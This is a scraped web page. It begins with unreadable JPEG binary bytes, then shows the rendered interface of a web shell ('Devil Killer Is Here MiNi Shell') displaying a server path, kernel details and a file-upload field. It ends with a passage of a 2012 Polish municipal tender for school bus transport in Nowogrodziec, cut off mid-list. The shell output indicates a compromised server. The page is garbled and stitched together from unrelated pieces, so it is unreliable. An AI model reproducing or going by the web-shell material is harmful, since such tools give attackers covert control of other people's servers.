JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120719/260476-N-2012.html

<p class="kh_header"><b>Nowogrodziec: DOWÓZ UCZNIÓW DO SZKÓŁ PODSTAWOWYCH  I GIMNAZJÓW Z TERENU GMINY NOWOGRODZIEC W ROKU SZKOLNYM 2012/2013</b><br>
<b>Numer ogłoszenia: 260476 - 2012; data zamieszczenia: 19.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Nowogrodziec , ul. Rynek 1, 59-730 Nowogrodziec, woj. dolnośląskie, tel. 75 7380660, faks 75 7316416.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowogrodziec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOWÓZ UCZNIÓW DO SZKÓŁ PODSTAWOWYCH  I GIMNAZJÓW Z TERENU GMINY NOWOGRODZIEC W ROKU SZKOLNYM 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwa zadania: Dowóz uczniów do szkół podstawowych i gimnazjów z terenu Gminy Nowogrodziec w roku szkolnym 2012/2013 w dni robocze z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych  na podstawie przepisów rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz. U. z 2002 r., Nr 46, poz. 432 z późn. zm.) w zakresie dowozu uczniów wraz z opiekunem do niżej wymienionych szkół podstawowych i gimnazjów:
1. Szkoła Podstawowa i Gimnazjum w Nowogrodźcu:
a) Liczba dowożonych i odwożonych uczniów z miejscowości Zabłocie - 22 osoby
Przebieg trasy dowozu - wyjazd z Zabłocia (przejazd obok fermy drobiu, tzw. kurniki)
do Nowogrodźca
Długość trasy dowozu - 6 km
Dzienna ilość kursów - rano 2 kursy - powrót 2 kursy
 
b) Liczba dowożonych i odwożonych uczniów z miejscowości Nowogrodziec, 
ul. Nowogrodzka - 8 osób
Przebieg trasy dowozu - wyjazd z Nowogrodźca, ul. Nowogrodzka do Nowogrodźca
Długość trasy dowozu - 3 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

c) Liczba dowożonych i odwożonych uczniów z Gościszowa - 54 osoby
Przebieg trasy dowozu  - wyjazd z Gościszowa do Nowogrodźca
Długość trasy dowozu  - 10 km
Dzienna ilość kursów - rano 2 kursy - powrót 2 kursy
 
d) Liczba dowożonych i odwożonych uczniów z Zebrzydowej - 26 osób 
Przebieg trasy dowozu  - wyjazd z Zebrzydowej do Nowogrodźca
Długość trasy dowozu  - 5 km
Dzienna ilość kursów - rano 2 kursy - powrót 2 kursy

 e) Liczba dowożonych i odwożonych uczniów z Parzyc - 47 osoby
Przebieg trasy dowozu  - wyjazd z Parzyc do Nowogrodźca
Długość trasy dowozu  - 6 km
Dzienna ilość kursów - rano 2 kursy - powrót 2 kursy

f) Liczba dowożonych i odwożonych uczniów z Gierałtowa - 41 osób
Przebieg trasy dowozu  - wyjazd z Gierałtowa PKP do Nowogrodźca
Długość trasy dowozu  - 9 km
Dzienna ilość kursów - rano 2 kurs - powrót 2 kurs

 g) Liczba dowożonych i odwożonych uczniów z Czernej - 27 osób
Przebieg trasy dowozu  - wyjazd z Czernej do Nowogrodźca
Długość trasy dowozu  - 8 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

h) Liczba dowożonych i odwożonych uczniów z Godzieszowa - 2 osoby
Przebieg trasy dowozu  - wyjazd z Godzieszowa do Nowogrodźca
Długość trasy dowozu  - 16 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

i) Liczba dowożonych i odwożonych uczniów z Kolonii Milików - 6 osób
Przebieg trasy dowozu - wyjazd z Kolonii Milików do Nowogrodźca
Długość trasy dowozu  - 4 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

j) Liczba dowożonych i odwożonych uczniów z Wykrot - 2 osoby
Przebieg trasy dowozu - wyjazd z Wykrot do Nowogrodźca
Długość trasy dowozu  -  12 km 
Dzienna ilość kursów - rano 2 kursy - powrót 2 kury
 
2. Zespół Szkół w Nowej Wsi:
a) Liczba dowożonych i odwożonych uczniów z Czernej - 21 osób 
Przebieg trasy dowozu  - wyjazd z Czernej do Nowej Wsi
Długość trasy dowozu  - 13 km
Dzienna ilość kursów - rano 2 kursy - powrót 2 kursy
 
b) Liczba dowożonych i odwożonych uczniów z Parzyc i z Zebrzydowej - 19 osób
Przebieg trasy dowozu  - wyjazd z Parzyc przez Zebrzydową i Zebrzydową PKP do Nowej Wsi
Długość trasy dowozu  - 7 km
Dzienna ilość kursów - rano 1 kurs - powrót 2 kursy
 
c) Liczba dowożonych i odwożonych uczniów z Bieńca, Kierżna i z Nowej Wsi (kierunek Bieniec) - 28 osób
Przebieg trasy dowozu  - wyjazd z Kierżna przez Bieniec do Nowej Wsi
Długość trasy dowozu  - 7 km
Dzienna ilość kursów - rano 1 kurs - powrót 2 kursy

3. Szkoła Podstawowa i Gimnazjum Wykroty:
a) Liczba dowożonych i odwożonych uczniów z Wykrot I przystanek - 17 osób
Przebieg trasy dowozu  - wyjazd z Wykrot I przystanek do Wykrot ostatni przystanek
Długość trasy dowozu  - 3 km
Dzienna ilość kursów - rano1 kurs - powrót 2 kursy
 
b) Liczba dowożonych i odwożonych uczniów z Godzieszowa - 4 osoby
Przebieg trasy dowozu  - wyjazd z Godzieszowa (przystanek na żądanie przy trasie nr 94) do Wykrot
Długość trasy dowozu  - 9 km
Dzienna ilość kursów - rano1 kurs - powrót 2 kursy

 c) Liczba dowożonych i odwożonych uczniów z przystanku Gierałtów PKP - 2 osoby 
Przebieg trasy dowozu  - wyjazd z Gierłtowa do Wykrot
Długość trasy dowozu  - 4 km
Dzienna ilość kursów - rano1 kurs - powrót 2 kursy

4. Szkoła Podstawowa w Gościszowie:
a) Liczba dowożonych i odwożonych uczniów z Gościszowa - 28 osób
Przebieg trasy dowozu  - wyjazd z Gościszowa do Gościszowa
Długość trasy dowozu  - 4 km
Dzienna ilość kursów - rano1 kurs - powrót 2 kursy
 
b) Liczba dowożonych i odwożonych uczniów z Mściszowa - 9 osób
Przebieg trasy dowozu  - wyjazd z Gościszowa do Mściszowa
Długość trasy dowozu  - 6 km
Dzienna ilość kursów - rano 1 kurs - powrót 2 kursy

5. Szkoła Podstawowa w Czernej:
a) Liczba dowożonych i odwożonych uczniów - 4 osoby
Przebieg trasy dowozu -  wyjazd z Czernej I przystanek do Czerniej II przystanek w stronę Nowej Wsi 
Długość trasy dowozu  - 4 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

b) Liczba dowożonych i odwożonych uczniów z Godzieszowa - 1 osoba
Przebieg trasy dowozu -  wyjazd z Godzieszowa do Czerniej  
Długość trasy dowozu  - 10 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

7. Szkoła Podstawowa w Gierałtowie
a) Liczba dowożonych i odwożonych uczniów z Gierałtowa - 1 osoba
Przebieg trasy dowozu -  wyjazd z Gierałtowa PKP do Gierałtowa przystanek przy kościele
Długość trasy dowozu  - 4 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

8. Przedszkole Publiczne w Nowogrodźcu
a) Liczba dowożonych i odwożonych dzieci z miejscowości Zabłocie - 10 osób
Przebieg trasy dowozu - wyjazd z Zabłocia (przejazd obok fermy drobiu, tzw. kurniki)
do Nowogrodźca
Długość trasy dowozu - 6 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

b) Liczba dowożonych i odwożonych dzieci z Kolonii Milików - 3 osoby
Przebieg trasy dowozu - wyjazd z Kolonii Milików do Nowogrodźca
Długość trasy dowozu  - 4 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

c) Liczba dowożonych i odwożonych dzieci z Milikowa - 4 osoby
Przebieg trasy dowozu - wyjazd z Milikowa do Nowogrodźca
Długość trasy dowozu  - 3 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

 d) Liczba dowożonych i odwożonych dzieci z Parzyc - 5 osób
Przebieg trasy dowozu  - wyjazd z Parzyc do Nowogrodźca
Długość trasy dowozu  - 6 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

e) Liczba dowożonych i odwożonych dzieci z Gościszowa - 1 osoba
Przebieg trasy dowozu  - wyjazd z Gościszowa do Nowogrodźca
Długość trasy dowozu  - 17 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs


9. Zespół Szkół Specjalnych w Bolesławcu:
a) Liczba dowożonych i odwożonych uczniów 
z Gierałtowa - 1 osoba
z Milikowa - 3 osoby
z Wykrot - 1 osoba
z Nowogrodźca - 4 osoby
z Czernej - 1 osoba
z Gościszowa - 1 osoba
a) Przebieg trasy dowozu - wyjazd z Gierałtowa przez Nowogrodziec do Bolesławca
Długość trasy dowozu - 21 km
 Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs

b) Przebieg trasy dowozu - wyjazd z Milikowa do Bolesławca
Długość trasy dowozu - 18 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs
c) Przebieg trasy dowozu  - wyjazd z Wykrot do Bolesławca
Długość trasy dowozu - 23 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs
d) Przebieg trasy dowozu  - wyjazd z Nowogrodźca do Bolesławca
Długość trasy dowozu - 15 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs
e) Przebieg trasy dowozu  - wyjazd z Czernej do Bolesławca
Długość trasy dowozu -   18 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs
f) Przebieg trasy dowozu  - wyjazd z Gościszowa do Bolesławca
Długość trasy dowozu -   25 km
Dzienna ilość kursów - rano 1 kurs - powrót 1 kurs
 Kursy ranne - dowóz uczniów do poszczególnych szkół podstawowych i gimnazjów 
na godzinę 7.30, 8.00, 8.50. Kursy powrotne -- odwóz uczniów z poszczególnych szkół podstawowych i gimnazjum w godzinach od 12.00 do 15.00.
Kursy popołudniowe należy uzgodnić z Dyrektorem Szkoły Podstawowej / Gimnazjum jednakże pierwszy kurs odbywa się między godz. 12.00 a 13.30, drugi kurs między godz. 13.30 a 15.00. 
W przypadku zmiany organizacji zajęć polegającej na:
- skróceniu godzin nauki, sprawdzianu klas szóstych, egzaminu gimnazjalnego;
- odpracowaniu zajęć z dnia wypadającego pomiędzy dwoma dniami świątecznymi ustawowo wolnymi od pracy lub piątku wypadającego bezpośrednio po dniu świątecznym ustawowo wolnym od pracy w sobotę lub z innych przyczyn Wykonawca zostanie powiadomiony przez szkołę o zmianie terminu dowozu lub odwozu uczniów.
- Wykonawca usługi ma zapewnić punktualny, bezpieczny, sprawny i bezawaryjny dowóz i odwóz uczniów wg ustalonego rozkładu jazdy autobusów/busów. 
- Zamawiający dopuszcza możliwość zorganizowania przewozu uczniów w połączeniu 
z przewozami otwartymi.
- Wykonawca będzie co miesiąc wystawiał dla uczniów i opiekunów imienny dokument potwierdzający prawo do skorzystanie z określonego dowozu z uwzględnieniem ulg ustawowych przewidzianych w przepisach ustawy o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (Dz. U. z 2002 r. Nr 175, poz. 1440 z późn. zm.). Na podstawie art. 11 ust 2. Ustawy o systemie oświaty oraz Rozporządzenia  Ministra Edukacji Narodowej z dnia 28 maja 2010 r. w sprawie świadectw, dyplomów państwowych i innych druków szkolnych (Dz. U z 7 czerwca 2010r, Nr 97 poz. 624) dokumentem uprawniającym do ulg są legitymacja szkolna oraz zaświadczenie o spełnianiu obowiązku rocznego przygotowania przedszkolnego. 
- Autobusy/busy Wykonawcy muszą być oznakowane, zgodnie z odrębnymi przepisami, tablicą informacyjną, iż przewożone są dzieci. Niedopuszczalne jest aby w autobusie jechała większa liczba dzieci niż miejsc przeznaczonych dla pasażerów (według dowodu rejestracyjnego pojazdu). 
- Wykonawca gwarantuje, iż w sytuacji awaryjnej na własny koszt zabezpieczy zastępczy środek transportu, w sposób zapewniający dowóz uczniów do szkół w wyznaczonym czasie.
- Ustalona długość tras, wykaz i ilość kursów, miejscowości oraz ilość dzieci może ulec zmianie w zależności od zatwierdzonego rozkładu zajęć lekcyjnych w szkołach. W zależności od tego zmianie ulegać będzie wynagrodzenie Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające w kwocie nieprzekraczającej 20% wartości zamówienia podstawowego, polegające na powtórzeniu tego samego rodzaju usług.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawcy wykażą, iż: posiadają aktualne uprawnienia do wykonywania działalności polegającej na przewozie osób tj. na podstawie art. 7 ust. 2 pkt 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2007r. Nr 125, poz. 874 ze. zm.) uzyskali licencję na wykonywanie krajowego transportu drogowego osób,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali min. jedną usługę porównywalną z przedmiotem niniejszego przetargu (jako usługę porównywalną uważa się wykonanie minimum jednej usługi codziennego dowozu, przewozu osób przez minimum 6 miesięcy o wartości minimalnej usługi brutto 50.000 zł) wraz z dokumentami potwierdzającymi wykonanie tej usługi z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.
Przedmiotowe wartości podane przez Wykonawców spoza terytorium Rzeczpospolitej Polskiej zostaną przeliczone na PLN według średniego kursu NBP na dzień otwarcia ofert.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
oraz zapewni odpowiednią liczbę miejsc siedzących w autobusie - odpowiednio do danej trasy.
Autobusy winny posiadać ważne na dzień składania ofert pakiet ubezpieczeń OC i NW dla każdego autobusu (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż posiada opłaconą polisę ubezpieczeniową na kwotę nie mniejszą niż 100.000 zł, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniania będzie ich łączna sytuacja  ekonomiczna i finansowa).  
Przedmiotowe wartości podane przez Wykonawców spoza terytorium Rzeczpospolitej Polskiej zostaną przeliczone na PLN według średniego kursu NBP na dzień otwarcia ofert.
Wymóg opłacenia polisy OC powinien być wypełniony na dzień składania ofert. Późniejsze jej opłacenie nie będzie uznane za spełnienie warunku udziału w postępowaniu. W sytuacji, gdy opłacenie składek nie wynika z samej treści polisy, Wykonawca powinien załączyć do polisy inny dokument potwierdzający odprowadzenie stosownych składek (np. wyciąg z konta bankowego).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku
do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku nastąpienia
co najmniej jednej z okoliczności wymienionych poniżej:
 - zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
